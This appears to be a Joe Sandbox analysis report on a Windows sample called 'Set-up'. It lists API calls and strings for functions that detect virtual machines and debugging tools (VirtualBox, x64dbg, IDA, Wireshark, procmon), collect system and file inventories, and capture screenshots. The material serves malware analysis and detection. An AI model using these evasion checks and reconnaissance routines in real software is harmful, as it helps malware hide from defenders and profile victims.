Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: ErrorLast$_errno$htonssetsockopt$bindgetsockoptstrrchr$CounterPerformanceQuery__sys_errlist__sys_nerrstrchrstrcpystrlenstrtoul
String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 2815861332-2373386790
Opcode ID: e7343f7eda3c394409f483716b6d670ac79bbd7fa8038dba9bd8a0b4061ab748
Instruction ID: 2483c8af181bcfec6be01ac9a19af7fd839a606c03ebd062a2f26a55206480dd
Opcode Fuzzy Hash: e7343f7eda3c394409f483716b6d670ac79bbd7fa8038dba9bd8a0b4061ab748
Instruction Fuzzy Hash: F4620171518382ABE720CF24C846BABB7F4BF94304F444529F988972D2E771E965CB93

Function 001D29FF Relevance: 63.3, APIs: 20, Strings: 16, Instructions: 321
stringprocessregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE ref: 001D2A27
RegOpenKeyExA.KERNELBASE ref: 001D2A8A
CharUpperA.USER32 ref: 001D2AEF
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 001D2B05
CreateToolhelp32Snapshot.KERNEL32 ref: 001D2B6D
Process32First.KERNEL32 ref: 001D2B88
Process32Next.KERNEL32 ref: 001D2BC0
QueryFullProcessImageNameA.KERNELBASE ref: 001D2C26
CloseHandle.KERNELBASE ref: 001D2C49
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 001D2C5F
CreateToolhelp32Snapshot.KERNEL32 ref: 001D2CC4
Process32First.KERNEL32 ref: 001D2CDF
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 001D2D0D
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 001D2D42
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 001D2D5C
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 001D2D76
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 001D2D90
Process32Next.KERNEL32 ref: 001D2DBF
CloseHandle.KERNELBASE ref: 001D2DFC
EnumWindows.USER32 ref: 001D2E21

Strings

WINDBG.EXE, xrefs: 001D2C4E
0, xrefs: 001D2DA9
SYSTEM\ControlSet001\Services\VBoxSF, xrefs: 001D2A76
ida.exe, xrefs: 001D2D7F
dbg_third, xrefs: 001D2E48
C:\USERS\PUBLIC\, xrefs: 001D2AF4
dbg, xrefs: 001D2C80
yadro, xrefs: 001D2EFB
dbg_sec, xrefs: 001D2DDE
wireshark.exe, xrefs: 001D2D31
x64dbg.exe, xrefs: 001D2D65
public_check, xrefs: 001D2B26
C:\Windows\System32\VBox*.dll, xrefs: 001D2A1B
procmon.exe, xrefs: 001D2D4B
vbox_second, xrefs: 001D2AAB
vbox_first, xrefs: 001D2A49

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strstr$Process32$First$CloseCreateHandleNextSnapshotToolhelp32$CharEnumFileFindFullImageNameOpenProcessQueryUpperWindowsstrncpy
String ID: 0$C:\USERS\PUBLIC\$C:\Windows\System32\VBox*.dll$SYSTEM\ControlSet001\Services\VBoxSF$WINDBG.EXE$dbg$dbg_sec$dbg_third$ida.exe$procmon.exe$public_check$vbox_first$vbox_second$wireshark.exe$x64dbg.exe$yadro
API String ID: 515599682-3783588604
Opcode ID: fa0d15e8612eff9ba79f88d23b24d738292022ab2afc1ce3d1e95851ae1c1615
Instruction ID: 228f61d901a97345b486367d5ce68aae4b8759a9e2546f3719b87b85b788334b
Opcode Fuzzy Hash: fa0d15e8612eff9ba79f88d23b24d738292022ab2afc1ce3d1e95851ae1c1615
Instruction Fuzzy Hash: 69E109B49053099FCB50EFA8D98569DBBF5AF88304F41886AE898D7350E774DD48CF42

Function 001D255D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 282
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 001D2579

Part of subcall function 0067A4B0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,001D2589), ref: 0067A4C5

GlobalMemoryStatusEx.KERNELBASE ref: 001D25CC
GetLogicalDriveStringsA.KERNEL32 ref: 001D2619
GetDriveTypeA.KERNELBASE ref: 001D2647
GetDiskFreeSpaceExA.KERNELBASE ref: 001D267E
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 001D2749
KiUserCallbackDispatcher.NTDLL ref: 001D27E2
SHGetKnownFolderPath.SHELL32 ref: 001D286D
wcscpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 001D28BE
wcscat.API-MS-WIN-CRT-STRING-L1-1-0 ref: 001D28D4
FindFirstFileW.KERNELBASE ref: 001D28F8
FindNextFileW.KERNELBASE ref: 001D291F
K32EnumProcesses.KERNEL32 ref: 001D296F

Strings

drivers, xrefs: 001D2769
Num_processor, xrefs: 001D258D
recent_files, xrefs: 001D2941
`, xrefs: 001D29BC
resolution_x, xrefs: 001D280D
uptime_minutes, xrefs: 001D29E4
Num_displays, xrefs: 001D27C3
name, xrefs: 001D26A2
all, xrefs: 001D26E0
resolution_y, xrefs: 001D282F
free, xrefs: 001D271E
Num_ram, xrefs: 001D25F0
@, xrefs: 001D25B4
processes, xrefs: 001D2996

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: DriveFileFind$CallbackDiskDispatcherEnumFirstFolderFreeGlobalInfoKnownLogicalMemoryNextPathProcessesSpaceStatusStringsSystemTypeUsermallocstrlenwcscatwcscpy
String ID: @$Num_displays$Num_processor$Num_ram$`$all$drivers$free$name$processes$recent_files$resolution_x$resolution_y$uptime_minutes
API String ID: 2116500361-3337672980
Opcode ID: e4c3e9c2748f10d4e23ab3e7f473f3d1bb32c910c0a5b9bee16820aed34643f8
Instruction ID: e5e572ca402149b5781bc26173fc09fb4c7411f2a462fe3c746d0f81466634c8
Opcode Fuzzy Hash: e4c3e9c2748f10d4e23ab3e7f473f3d1bb32c910c0a5b9bee16820aed34643f8
Instruction Fuzzy Hash: 5BD1D5B49057199FCB50EFB8C98569EBBF1BF88314F01896DE49897301E7349A84CF52

Function 00568C8A Relevance: 45.6, APIs: 16, Strings: 10, Instructions: 134
filelibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 00568CCF
GetProcAddress.KERNEL32 ref: 00568CF3
GetProcAddress.KERNEL32 ref: 00568D09
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00568EEF
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00568F10
FreeLibrary.KERNEL32 ref: 00568F18

Part of subcall function 00567E20: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00567E6D
Part of subcall function 00567E20: wcscmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00567EB6
Part of subcall function 00567E20: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00567ED8

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00568F97
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00568FB8
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00568FCF
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00568FF0
FreeLibrary.KERNEL32 ref: 00568FF8
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00569017
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00569038
FreeLibrary.KERNEL32 ref: 00569040

Strings

Failed to create GDI+ bitmap, xrefs: 00568F09
GdipCreateBitmapFromHBITMAP, xrefs: 00568CE8
Failed to load gdiplus.dll, xrefs: 00568FB1
!, xrefs: 0056901D
Failed to load GDI+ functions, xrefs: 00568FE9
GdipSaveImageToStream, xrefs: 00568CFE
gdiplus.dll, xrefs: 00568CC8
image/jpeg, xrefs: 00568D54
Failed to allocate buffer, xrefs: 00569138
Failed to get JPEG encoder CLSID, xrefs: 00569031

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: Library__acrt_iob_funcfwrite$Free$AddressProc$Loadfreemallocwcscmp
String ID: !$Failed to allocate buffer$Failed to create GDI+ bitmap$Failed to get JPEG encoder CLSID$Failed to load GDI+ functions$Failed to load gdiplus.dll$GdipCreateBitmapFromHBITMAP$GdipSaveImageToStream$gdiplus.dll$image/jpeg
API String ID: 4185073593-1943330374
Opcode ID: 485b3d60833726c0b4ae63708041566e4c094ac4e4377129aa57e73ec608e0a3
Instruction ID: 55ca289b51811290aec21a47dd6ffbb25bb06ae2947bb96a7920fdbbaa0e04f6
Opcode Fuzzy Hash: 485b3d60833726c0b4ae63708041566e4c094ac4e4377129aa57e73ec608e0a3
Instruction Fuzzy Hash: 8A5139B48093049FD710AF69D94876EBFF0BF45314F11896DE88897241DB799888DF53

Function 0020F100 Relevance: 29.3, APIs: 1, Strings: 15, Instructions: 1303networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(?), ref: 0020F75B

Part of subcall function 001ED8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,001E01B1), ref: 001ED8E2

Strings

connect.c, xrefs: 0020F3BB, 0020F4FA
%s trying next, xrefs: 0020F8FE
ipv4, xrefs: 0020F331, 0020F34B, 0020F36C, 0020F3EC, 0020F5BB
%s connect -> %d, connected=%d, xrefs: 0020F720
ipv6, xrefs: 0020F3DC
%s connect timeout after %lldms, move on!, xrefs: 0020FA33
%s starting (timeout=%lldms), xrefs: 0020FCDD, 0020FEB1
created %s (timeout %lldms), xrefs: 0020F4BE, 0020F5DF
Connection time-out, xrefs: 0020F2A3
Connection timeout after %lld ms, xrefs: 002100AC
%s done, xrefs: 0020F9CD, 0020FD27, 0020FF03
all eyeballers failed, xrefs: 002100FF
Connected to %s (%s) port %u, xrefs: 00210026
Failed to connect to %s port %u after %lld ms: %s, xrefs: 00210254
%s assess started=%d, result=%d, xrefs: 00210150, 002101AE

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: CounterErrorLastPerformanceQuery
String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
API String ID: 1297246462-1590685507
Opcode ID: a8e062d3fc49c054200330751fc1fcd154833354f65a15083d711d3b7f11ee42
Instruction ID: aef7a6c91ebfa1ab7857ef3d07b374ea7143ba16e7ca9a56c0b3a6057161a740
Opcode Fuzzy Hash: a8e062d3fc49c054200330751fc1fcd154833354f65a15083d711d3b7f11ee42
Instruction Fuzzy Hash: 81C2EE31A143459FD724CF28C584B6AB7E1BF98314F08C66DEC988B6A2D771ED94CB81

Function 0029AA30 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 364
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

htons.WS2_32(?), ref: 0029AAE8
htons.WS2_32(?), ref: 0029AB33
socket.WS2_32(FFFFFFFF,?,00000000), ref: 0029AB9A
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0029ABE3
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0029AC02
setsockopt.WS2_32(?,0000FFFF,00001002,00000000,00000004), ref: 0029AC29
htonl.WS2_32(00000000), ref: 0029AC69
bind.WS2_32(?,00000017,0000001C), ref: 0029ACCF
setsockopt.WS2_32(?,00000029,0000001B,0000001C,00000004), ref: 0029ACFE
setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 0029AD20
WSAGetLastError.WS2_32 ref: 0029ADB5
closesocket.WS2_32(?), ref: 0029AE6F

Strings

X\h, xrefs: 0029AA56
`\h, xrefs: 0029AE75

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: setsockopt$htons$ErrorLastbindclosesockethtonlioctlsocketsocket
String ID: X\h$`\h
API String ID: 4039825230-1840809173
Opcode ID: 85650b8b4632d9c4416d31b704dabd9586cbcd881f8e0cf9a313aefee8430009
Instruction ID: 830a684b1101f2e444d8c4c3f36fc182a8c0cdf6dc5315998852c744281b96d1
Opcode Fuzzy Hash: 85650b8b4632d9c4416d31b704dabd9586cbcd881f8e0cf9a313aefee8430009
Instruction Fuzzy Hash: 70E1F1706243029FEB20CF24C844B6AB7E5FF89304F044A2DF9998B2A1D775DD64DB92

Function 001D116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 001D11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 001D1238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001D124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001D1261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D12EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 001D1323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 001D1344
GetStartupInfoA.KERNEL32 ref: 001D1433

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 3873122205-0
Opcode ID: 3f5ab1f2682b733cb617f2d4e1b610e1d756508adc8bed18bc62bca48804917a
Instruction ID: d23573dc64a2b6b58ddcbb935276a3ddc3f596f04d054e803ef0e31ab6639e90
Opcode Fuzzy Hash: 3f5ab1f2682b733cb617f2d4e1b610e1d756508adc8bed18bc62bca48804917a
Instruction Fuzzy Hash: 6381E275A08345BFDB14DFA4D985BAE7BF0FB46300F11442ED9459B311D7369888DB81

Function 00558E90 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 00558EAD
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00558EFA
_write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00558F4A
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00558F59

Strings

CONOUT$, xrefs: 00558EA6
@, xrefs: 00682131
terminated, xrefs: 00558F20

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: f9a5ebbc7c929fd2da275fca1fb4d52e5032077705ce52ff82f71fa8bc652a94
Instruction ID: 856bcbd1a6803696f4a1466912a347b1f3a01a651352b0b86871a7a6cd0ace69
Opcode Fuzzy Hash: f9a5ebbc7c929fd2da275fca1fb4d52e5032077705ce52ff82f71fa8bc652a94
Instruction Fuzzy Hash: 82414CB49183069FCB00EF79C45966EBBF4BB48305F118A2AE994D7350EB34C849DF55

Function 006781F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

error CryptGenRandom 0x%08lx, xrefs: 00678369

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID:
String ID: error CryptGenRandom 0x%08lx
API String ID: 0-1222942552
Opcode ID: 10d5489e13997d934fefe3c9761a8b120ba94c814f9373ea8e9aa78fc305ffd8
Instruction ID: 4635fb04e0bf42c0c95bb4f453b7e4fbd790daac59bbeace45158b700016fb08
Opcode Fuzzy Hash: 10d5489e13997d934fefe3c9761a8b120ba94c814f9373ea8e9aa78fc305ffd8
Instruction Fuzzy Hash: E841E4B55197019FC700EFB8C58961EBBE0BB89311F418E2EF88887321EB74C9489F42

Function 001E05B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 369
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAEventSelect.WS2_32(?,8508C483,?), ref: 001E0711
getsockopt.WS2_32(?,0000FFFF,00001008,?,00000004), ref: 001E0783
WSAWaitForMultipleEvents.WS2_32(00000001,001D3EBE,00000000,00000000,00000000), ref: 001E086F
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 001E08EF
WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 001E0934
WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 001E09DC
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 001E09FB
WSAResetEvent.WS2_32(8508C483), ref: 001E0A1F

Strings

multi.c, xrefs: 001E07B2

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
